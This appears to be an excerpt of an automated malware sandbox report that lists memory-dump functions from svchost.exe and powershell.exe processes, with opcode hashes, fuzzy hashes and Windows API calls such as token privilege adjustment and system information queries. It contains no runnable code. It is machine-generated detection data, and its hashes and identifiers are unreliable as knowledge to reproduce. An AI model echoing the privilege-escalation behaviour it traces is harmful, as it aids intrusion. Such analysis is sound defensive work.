                                                    • Opcode ID: 24a150a91df3262c95256840ffcb2b937e900cdb6593befcfef0d9651583e8d1
                                                    • Instruction ID: e43046fbaa4ff2f932c27d1a04106c2107508db349c9406d815a0a35afc724f8
                                                    • Opcode Fuzzy Hash: 24a150a91df3262c95256840ffcb2b937e900cdb6593befcfef0d9651583e8d1
                                                    • Instruction Fuzzy Hash: F201D672509380AFD7128B159C40862FFB8DE86660708C0DFEC898B613C125A809CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027E081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182805896.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 912673622ab4935a0ec33be9742443176bfa1493f307bb27cd872e66ab8bd203
                                                    • Instruction ID: 5cfc548be871c8d232e3eb1704438286e04d45e53d32625693a54bf66a4bb0b1
                                                    • Opcode Fuzzy Hash: 912673622ab4935a0ec33be9742443176bfa1493f307bb27cd872e66ab8bd203
                                                    • Instruction Fuzzy Hash: 65E092766007048BD750CF0AEC81452F7E4EB84A30B58C07FDD0D8B700D536B908CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05810860, Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2199283332.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 539fe6c2af1154135f3ac5f98c541c7328153dea08b53d6f7d78f70d1cc10319
                                                    • Instruction ID: 2eeaba383c07e9f631d12f75591f45290d51ea04b8cc04b350e8490a1a9df8d6
                                                    • Opcode Fuzzy Hash: 539fe6c2af1154135f3ac5f98c541c7328153dea08b53d6f7d78f70d1cc10319
                                                    • Instruction Fuzzy Hash: 4BE04F2160F7C04FC3039768A8602997F726B83199B0E01FBC481CF197D6591846DB63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025D23F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181837173.00000000025D2000.00000040.00000001.sdmp, Offset: 025D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0c35e403320ec198d9996922969c344e3c1cd1eb1422c4dffe156857c42ad80
                                                    • Instruction ID: 59c752c61b05aea923d884e93ee178ee8aab331f3c49ec4f625357c5bf293503
                                                    • Opcode Fuzzy Hash: f0c35e403320ec198d9996922969c344e3c1cd1eb1422c4dffe156857c42ad80
                                                    • Instruction Fuzzy Hash: 52D05E79206A818FD7278A1CC1A4B953B94BF55B08F4644F9EC40CB6A3C768F581D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025D23BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181837173.00000000025D2000.00000040.00000001.sdmp, Offset: 025D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c550f1a76850e8375e9486bbe4733af05c6e6de98e25f14f1f1b08924317440
                                                    • Instruction ID: eb16242cd5d87d09a7efcc5c94ae67f0098d6de8f4b2cc53e21338826349e434
                                                    • Opcode Fuzzy Hash: 6c550f1a76850e8375e9486bbe4733af05c6e6de98e25f14f1f1b08924317440
                                                    • Instruction Fuzzy Hash: F5D052343106818FDB2ACA1CC294F597BE8BF80B08F0644E8BC00CB366C3A8E880CA04
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: svchost.exe PID: 2916 Parent PID: 1388 svchost.exeCOMMON

                                                    Executed Functions

                                                    Function 00240490, Relevance: 6.5, Strings: 5, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001E.00000002.2198852428.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fCl$fCl$fCl$fCl$fCl
                                                    • API String ID: 0-2453322616
                                                    • Opcode ID: bf789680192453ac01e6664b2a1ff2f7a618afa42ce0084399bb866770537016
                                                    • Instruction ID: 61af7fb93a42699be0ccc785ad6b364cf7cf9620ccee3543d6b45fa8171c27ac
                                                    • Opcode Fuzzy Hash: bf789680192453ac01e6664b2a1ff2f7a618afa42ce0084399bb866770537016
                                                    • Instruction Fuzzy Hash: 1B918E38B001099FDB08EF74C891AAEB7F6EBC8300F148529E916EB395DB749D418B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00240457, Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001E.00000002.2198852428.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 599466b675068597d39b83bf83268acc2a0bd56504bfcf67b616be3fa21aa705
                                                    • Instruction ID: 96d64f6201c64c86ceef471aa062a0d38b03ecf7a554696236983540368f3991
                                                    • Opcode Fuzzy Hash: 599466b675068597d39b83bf83268acc2a0bd56504bfcf67b616be3fa21aa705
                                                    • Instruction Fuzzy Hash: 00219D759092958FCB06CF758DA45EB7FB1AF8720071804DAD585EB2A7D7340909CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2920 Parent PID: 1192 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 006DACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 006DAD37
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: df9e25784a1254c314a0e4ba422fbe8ed4f6ff3338303f0b51a83259709185d7
                                                    • Instruction ID: ac5d0aab8eae1c3505dc1ab1bff416a48138e1d07643e451a17efb94e1e270b1
                                                    • Opcode Fuzzy Hash: df9e25784a1254c314a0e4ba422fbe8ed4f6ff3338303f0b51a83259709185d7
                                                    • Instruction Fuzzy Hash: EF21B1765097849FEB228F25DC44B92BFB4EF16310F08849BE9858B663D2719908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 006DAD37
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: b430849e2d28e6ddb5b315b9634e7be928c667c584dabd76985168b0d82edc9c
                                                    • Instruction ID: 19106dd2cec62af85d20da16e8c38eded5af1c034c3b7e0ee492e165fb33521d
                                                    • Opcode Fuzzy Hash: b430849e2d28e6ddb5b315b9634e7be928c667c584dabd76985168b0d82edc9c
                                                    • Instruction Fuzzy Hash: E3114F75904604DFEB208F55D844B96FBE5EF05311F04846ADD468AA62D371E814DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006DB329
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: f517e58595c01229bb570a3542460752744bc1383a71bd835173698c3388c487
                                                    • Instruction ID: f57005f14915fded5ee1a8a99625eb168febbb88a0e8b14793e3f7ee8051fed4
                                                    • Opcode Fuzzy Hash: f517e58595c01229bb570a3542460752744bc1383a71bd835173698c3388c487
                                                    • Instruction Fuzzy Hash: EE11A071508384EFDB228F11DC45F62FFB4EF06320F09849AED854B662C275A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006DB329
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 06788a75cbd06035ef5db2a8aa681eaa673b7c134f8d08b8bc4d7a8652f1a1fa
                                                    • Instruction ID: 472f69d127893e223325c931f4f2ac63c5d184f2265eb46aa5b81f5831cc472a
                                                    • Opcode Fuzzy Hash: 06788a75cbd06035ef5db2a8aa681eaa673b7c134f8d08b8bc4d7a8652f1a1fa
                                                    • Instruction Fuzzy Hash: 8501AD36800704DFEB208F45D885B61FBA1EF18721F09C09ADD490B716C371A418EB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028001D0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: e0f2527f80836ba13acb6530155c3f12e2ad1157501bfd7a947239d8b05c5b9d
                                                    • Instruction ID: 9872d0e7691e5bacb454026e9a43c7f97da4b88518bb17ce24cbfeb1b42441b9
                                                    • Opcode Fuzzy Hash: e0f2527f80836ba13acb6530155c3f12e2ad1157501bfd7a947239d8b05c5b9d
                                                    • Instruction Fuzzy Hash: DC31396650E3C08FE7138B759C65791BFB4AF07210F0E84DBD884CF1A3D6659849D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0280067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0280072D
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a5ae8ef77a37f721d376bb3511abcdc51a63ba69bd09322dac4e083115cc9069
                                                    • Instruction ID: 51671459b06bb3b84c3b6b29ca84b6cdc9b5716077c4b1247399fa4e7ad85ea9
                                                    • Opcode Fuzzy Hash: a5ae8ef77a37f721d376bb3511abcdc51a63ba69bd09322dac4e083115cc9069
                                                    • Instruction Fuzzy Hash: 7D315075505380AFE722CF65CC85F56BFF8EF05210F09849EE989CB293D365A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02800DD6
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: c1f97deb66c36031c8d18b18171112a9d2e30fb33a3871b5e03bf7f06ecc420a
                                                    • Instruction ID: 7f51a47e57e3f96094343cbad15d8d8dffe1dc68102b2f340b92252228fe78d2
                                                    • Opcode Fuzzy Hash: c1f97deb66c36031c8d18b18171112a9d2e30fb33a3871b5e03bf7f06ecc420a
                                                    • Instruction Fuzzy Hash: 72318675509380AFE712CB25DC85F96BFE8DF06214F0884AAE948DB293D375A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 2c7b48c7fa39477da6ada007f656134e11ef6c33d0be5fbf2dc146963c356b3e
                                                    • Instruction ID: 54585b7f85ac27e3b8658a4b0d914ad7972c9a48914caa7f28b17a172f64e413
                                                    • Opcode Fuzzy Hash: 2c7b48c7fa39477da6ada007f656134e11ef6c33d0be5fbf2dc146963c356b3e
                                                    • Instruction Fuzzy Hash: D821E4B2509380AFE712CF61DC45B96BFB8EF06320F0984DBE985DB193C265A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 4a76f3f25d7c05dfa607eddf557199cdf85aba96ecdb181391a7161648c46ddc
                                                    • Instruction ID: f0c43b4bcb3bdbff75aed459c549a7053797a1a5485848b785cab1dd52f67c34
                                                    • Opcode Fuzzy Hash: 4a76f3f25d7c05dfa607eddf557199cdf85aba96ecdb181391a7161648c46ddc
                                                    • Instruction Fuzzy Hash: 6D31C372409380AFE722CB61CC45F96BFB8EF06310F0984DBF985CB192D224A908C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0280109E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 8cf7f0bcec1636caef9cf25d0d098f911dd341be8ee44088bf63dff3ce06cdfe
                                                    • Instruction ID: 36444e216a131bdb9e2bbd1805ea1dd5725b28b0c4f64e56b745b9b13b94ad57
                                                    • Opcode Fuzzy Hash: 8cf7f0bcec1636caef9cf25d0d098f911dd341be8ee44088bf63dff3ce06cdfe
                                                    • Instruction Fuzzy Hash: 3B316F7550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: e3f476c09e361809942ce234d0b30a85e0d15402b963278e4699986fd54c50d7
                                                    • Instruction ID: 0fa25d544279491e12bb2a436b26e8ad8966100f563558951753d93465289b37
                                                    • Opcode Fuzzy Hash: e3f476c09e361809942ce234d0b30a85e0d15402b963278e4699986fd54c50d7
                                                    • Instruction Fuzzy Hash: 5A219171505380EFE722CB15CC45FA7BFB8EF46320F09849BE945DB292D764A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 02800819
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: dd2ef3af5330a245b118475042dbe480fd1615d074c5234c632dd83c1412b68e
                                                    • Instruction ID: 0b3c9a739ac79d25c84dd9603aaf2d8d43240a6ae95fc24596913e26c0067f5b
                                                    • Opcode Fuzzy Hash: dd2ef3af5330a245b118475042dbe480fd1615d074c5234c632dd83c1412b68e
                                                    • Instruction Fuzzy Hash: 9C21DA76408784AFE712CB159C85FA3BFA8EF46720F0981DBF9858F193D264A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 006DA23E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 4b45e9cb5d762e73a57315625f04b9cbd240bba17eadb248b8ba5c0f277598f0
                                                    • Instruction ID: 3a02b856e1841699c662fe57eb42aeb7d69ede16e27748ca6f65b77db815a8b4
                                                    • Opcode Fuzzy Hash: 4b45e9cb5d762e73a57315625f04b9cbd240bba17eadb248b8ba5c0f277598f0
                                                    • Instruction Fuzzy Hash: 6121C47180D3C0AFD3128B258C55B66BFB4EF47620F0981DBD8848F693D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02800502
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 330baa9056a3c23bad633d957529b2c405fa45af38ae1024b9a4241172b84f5e
                                                    • Instruction ID: 5b0a57e91692599b169f409e7c7ef41a35bcf75848f4511ba051d87d2ec610d6
                                                    • Opcode Fuzzy Hash: 330baa9056a3c23bad633d957529b2c405fa45af38ae1024b9a4241172b84f5e
                                                    • Instruction Fuzzy Hash: B921717540E3C0AFD3128B758C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028006AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0280072D
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 0a0dc5a974e628c9bed380d74ffdc2dfa654fad49005853d4611359551e3b20f
                                                    • Instruction ID: b310cf72f0db49f5368732e2b9c54ac5ed31299f6ab958cacab268be624b9438
                                                    • Opcode Fuzzy Hash: 0a0dc5a974e628c9bed380d74ffdc2dfa654fad49005853d4611359551e3b20f
                                                    • Instruction Fuzzy Hash: 74217C79500704EFEB21DF65CC85F66FBE8EF08650F04846AE949CA292D776F904CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 028008E5
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 20662481bba498cef048d171ff428107bffdbc89e2d2d90a76b157e9c30eb096
                                                    • Instruction ID: 5d40bb545ce826b76bd97e9be98b95c67cb33010668ff59b09b287bc7f388fb6
                                                    • Opcode Fuzzy Hash: 20662481bba498cef048d171ff428107bffdbc89e2d2d90a76b157e9c30eb096
                                                    • Instruction Fuzzy Hash: 19219276409380AFE722CF51DC45F56FFB8EF06314F09849BE9449B193C265A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 006DA94A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 5e2563f6acf4722f835e401127a00e336476443edece362023a26620627f1c10
                                                    • Instruction ID: 48084763e886faac636cb908e7ba9e7721029e31b7cadf398e498eac047b5335
                                                    • Opcode Fuzzy Hash: 5e2563f6acf4722f835e401127a00e336476443edece362023a26620627f1c10
                                                    • Instruction Fuzzy Hash: 2B219575409780AFD3138B259C51B62BFB4EF87710F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02800DD6
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: dd6ccbade20097363d88d92976e77ad2f767fa5ae438e64482afbb203c2c2439
                                                    • Instruction ID: d9ea5d1031f3431179a744358a34937cf4ff6b2c5bad5abeead8ee9c3e2ada75
                                                    • Opcode Fuzzy Hash: dd6ccbade20097363d88d92976e77ad2f767fa5ae438e64482afbb203c2c2439
                                                    • Instruction Fuzzy Hash: 4D219D79600204AFF760DB25DC85BA6FBE8EF04214F04856AED48DB282D775F904CA72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: ccda2a64e7a550e90562dc9a433d147355902bec922d8d94f3c35b0603f1da94
                                                    • Instruction ID: 8e837366b9460a96785d4c082fd327d24ddf95e51a65e3e07cbc3a6afb408de1
                                                    • Opcode Fuzzy Hash: ccda2a64e7a550e90562dc9a433d147355902bec922d8d94f3c35b0603f1da94
                                                    • Instruction Fuzzy Hash: 10119D72500304EFEB21CF61DC85FAAFBA8EF04320F14856AF945DA245D670A9058BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02800FB0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 16d643ad8c477e201686e90df30d942a7cdf93c695afc618367dc4e448d5e33e
                                                    • Instruction ID: b0894e3d289e8bb61fbba90522ce9eed38b477f2e2a5f582822de43e4e11822d
                                                    • Opcode Fuzzy Hash: 16d643ad8c477e201686e90df30d942a7cdf93c695afc618367dc4e448d5e33e
                                                    • Instruction Fuzzy Hash: 94216F7550D3C09FDB12CB25DC95B92BFB4AF03214F0D84DAD988CF693D2659408D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0280137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 6bef4d7f621a23c3e75632d32048da8372dbd1a7dd1bff3b29c15d0454584b55
                                                    • Instruction ID: b07c96217a0da1ccdb1f5d38c71331297bb8754836b9be84dec1ec02fb892708
                                                    • Opcode Fuzzy Hash: 6bef4d7f621a23c3e75632d32048da8372dbd1a7dd1bff3b29c15d0454584b55
                                                    • Instruction Fuzzy Hash: E121C2765047809FEB21CF21DC85B92FFF4EF02320F08849AED898B162C335A448CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: ee3b96d2f6ad0824455500f1d9e93926923201edfdaf37ba94520b4174c67d3a
                                                    • Instruction ID: 296d9535451c8871e8f1d63886eaa9ac55782976382a1185863db83679eccaf1
                                                    • Opcode Fuzzy Hash: ee3b96d2f6ad0824455500f1d9e93926923201edfdaf37ba94520b4174c67d3a
                                                    • Instruction Fuzzy Hash: BA116A75600304EFEB20DF55DC85FAABBA8EF44760F14846AE9098B295D764A9088AA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 006DAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 99f4c3f2c0410315dee56aba53948d4625d7388c41e25939514d283412b35c81
                                                    • Instruction ID: 0ccadb80e1b30d3e8f3dd567be31bb830466dd89f38086d0fa957b321f7d095a
                                                    • Opcode Fuzzy Hash: 99f4c3f2c0410315dee56aba53948d4625d7388c41e25939514d283412b35c81
                                                    • Instruction Fuzzy Hash: 612172716093809FDB21CF65DC44BA2FFE8EF56210F0884ABED49CB352D265E808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 006DBB2F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 14d2e16f7b0919fee773ca0c8098254c5df70e816657a5c9585da5f89526de27
                                                    • Instruction ID: deffab7a1e13365854a7fdf523e0b66e2e1d3d96bfeec5667aede748f41b0f0f
                                                    • Opcode Fuzzy Hash: 14d2e16f7b0919fee773ca0c8098254c5df70e816657a5c9585da5f89526de27
